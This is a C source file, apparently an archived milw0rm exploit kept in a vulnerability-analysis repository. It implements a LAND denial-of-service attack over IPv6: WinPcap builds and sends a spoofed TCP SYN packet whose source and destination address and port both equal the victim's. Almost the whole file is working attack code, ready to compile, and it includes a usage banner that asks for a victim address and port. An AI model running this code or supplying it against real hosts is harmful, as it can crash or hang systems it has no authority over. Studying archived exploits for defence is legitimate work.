lilbool/vuln-code-analysis
0
1//
2// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D}
3//fe80::2a1:b0ff:fe08:8bcc 135
4//
5// Written by: Konrad Malewski.
6//
7
8#include <stdlib.h>
9#include <stdio.h>
10#include <Winsock2.h>
11#include <ws2tcpip.h>
12#include <pcap.h>
13#include <remote-ext.h>
14///////////////////////////////////////////////////////////////////////////////
15///////////// from libnet /////////////
16/* ethernet addresses are 6 octets long */
17#define ETHER_ADDR_LEN 0x6
18
19typedef unsigned char u_int8_t;
20typedef unsigned short u_int16_t;
21typedef unsigned int u_int32_t;
22typedef unsigned __int64 u_int64_t;
23/*
24* Ethernet II header
25* Static header size: 14 bytes
26*/
27struct libnet_ethernet_hdr
28{
29u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
30u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
31u_int16_t ether_type; /* protocol */
32};
33
34struct libnet_in6_addr
35{
36union
37{
38u_int8_t __u6_addr8[16];
39u_int16_t __u6_addr16[8];
40u_int32_t __u6_addr32[4];
41} __u6_addr; /* 128-bit IP6 address */
42};
43
44
45/*
46* IPv6 header
47* Internet Protocol, version 6
48* Static header size: 40 bytes
49*/
50struct libnet_ipv6_hdr
51{
52u_int8_t ip_flags[4]; /* version, traffic class, flow label */
53u_int16_t ip_len; /* total length */
54u_int8_t ip_nh; /* next header */
55u_int8_t ip_hl; /* hop limit */
56struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
57
58};
59
60/*
61* TCP header
62* Transmission Control Protocol
63* Static header size: 20 bytes
64*/
65struct libnet_tcp_hdr
66{
67u_int16_t th_sport; /* source port */
68u_int16_t th_dport; /* destination port */
69u_int32_t th_seq; /* sequence number */
70u_int32_t th_ack; /* acknowledgement number */
71u_int8_t th_x2:4, /* (unused) */
72th_off:4; /* data offset */
73
74u_int8_t th_flags; /* control flags */
75u_int16_t th_win; /* window */
76u_int16_t th_sum; /* checksum */
77u_int16_t th_urp; /* urgent pointer */
78};
79
80int libnet_in_cksum(u_int16_t *addr, int len)
81{
82int sum;
83union
84{
85u_int16_t s;
86u_int8_t b[2];
87}pad;
88sum = 0;
89while (len > 1)
90{
91sum += *addr++;
92len -= 2;
93}
94if (len == 1)
95{
96pad.b[0] = *(u_int8_t *)addr;
97pad.b[1] = 0;
98sum += pad.s;
99}
100return (sum);
101}
102#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16))
103& 0xffff))
104
105///////////////////////////////////////////////////////////////////////////////
106///////////////////////////////////////////////////////////////////////////////
107u_char packet[74];
108struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
109struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
110struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
111
112u_char errbuf[1024];
113pcap_t *pcap_handle;
114
115
116void usage(char* n)
117{
118pcap_if_t * alldevs,*d;
119int i=1;
120fprintf(stdout,"Usage:\n"
121"\t %s <device> <victim> <port>\n",n);
122
123if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
124{
125fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
126exit(EXIT_FAILURE);
127}
128printf("Avaliable adapters: \n");
129d = alldevs;
130while (d!=NULL)
131{
132printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
133d = d->next;
134}
135pcap_freealldevs (alldevs);
136}
137///////////////////////////////////////////////////////////////////////////////
138int main(int argc, char* argv[])
139{
140if ( argc<4 )
141{
142usage(argv[0]);
143return EXIT_FAILURE;
144}
145
146int retVal;
147struct addrinfo hints,*addrinfo;
148
149ZeroMemory(&hints,sizeof(hints));
150
151WSADATA wsaData;
152if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
153{
154fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
155return EXIT_FAILURE;
156}
157//
158// Get MAC address of remote host (assume link local IpV6 address)
159//
160
161hints.ai_family = PF_INET6;
162hints.ai_socktype = SOCK_STREAM;
163hints.ai_protocol = IPPROTO_TCP;
164hints.ai_flags = AI_PASSIVE;
165
166retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
167if ( retVal!=0 )
168{
169WSACleanup();
170fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
171exit(EXIT_FAILURE);
172}
173
174//
175// Open WinPCap adapter
176//
177if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS,
178100, (char*)errbuf)) == NULL )
179{
180freeaddrinfo(addrinfo);
181WSACleanup();
182fprintf(stderr, "Error opening device: %s\n",argv[1]);
183return EXIT_FAILURE;
184}
185
186ZeroMemory(packet,sizeof(packet));
187struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
188
189// fill ethernet header
190eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like
19100:something;
192eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
193eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
194eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
195eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
196eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
197eth_hdr->ether_type = 0xdd86;
198
199
200// fill IP header
201// source ip == destination ip
202
203memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
204
205memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
206ip6_hdr->ip_hl = 255;
207ip6_hdr->ip_nh = IPPROTO_TCP;
208ip6_hdr->ip_len = htons (20);
209ip6_hdr->ip_flags[0] = 0x06 << 4;
210srand((unsigned int) time(0));
211// fill tcp header
212tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source
213port equal to destination
214tcp_hdr->th_seq = rand();
215tcp_hdr->th_ack = rand();
216tcp_hdr->th_off = htons(5);
217tcp_hdr->th_win = rand();
218tcp_hdr->th_sum = 0;
219tcp_hdr->th_urp = htons(10);
220tcp_hdr->th_off = 5;
221tcp_hdr->th_flags = 2;
222// calculate tcp checksum
223int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
224chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
225chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct
226libnet_tcp_hdr));
227tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
228// send data to wire
229retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
230if ( retVal == -1 )
231{
232fprintf(stderr,"Error writing packet to wire!!\n");
233}
234//
235// close adapter, free mem.. etc..
236//
237pcap_close(pcap_handle);
238freeaddrinfo(addrinfo);
239WSACleanup();
240return EXIT_SUCCESS;
241}
242
243// milw0rm.com [2005-05-17]